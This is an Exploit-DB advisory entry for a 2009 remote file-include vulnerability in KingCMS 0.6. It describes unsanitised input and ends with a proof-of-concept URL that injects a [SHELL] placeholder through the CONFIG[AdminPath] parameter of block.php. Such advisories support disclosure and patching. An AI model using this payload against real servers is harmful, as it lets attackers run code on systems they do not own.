KingCMS 0.6 - 'CONFIGAdminPath' Parameter Remote File Include Vulnerability

2009-09-07T00:00:00
ID EDB-ID:34561
Type exploitdb
Reporter Securitylab.ir
Modified 2009-09-07T00:00:00

Description

KingCMS 0.6 'CONFIG[AdminPath]' Parameter Remote File Include Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/42924/info

KingCMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

KingCMS 0.6.0 is vulnerable; other versions may be affected. 

http://www.example.com/[path]/include/engine/content/elements/block.php? CONFIG[AdminPath] =[SHELL]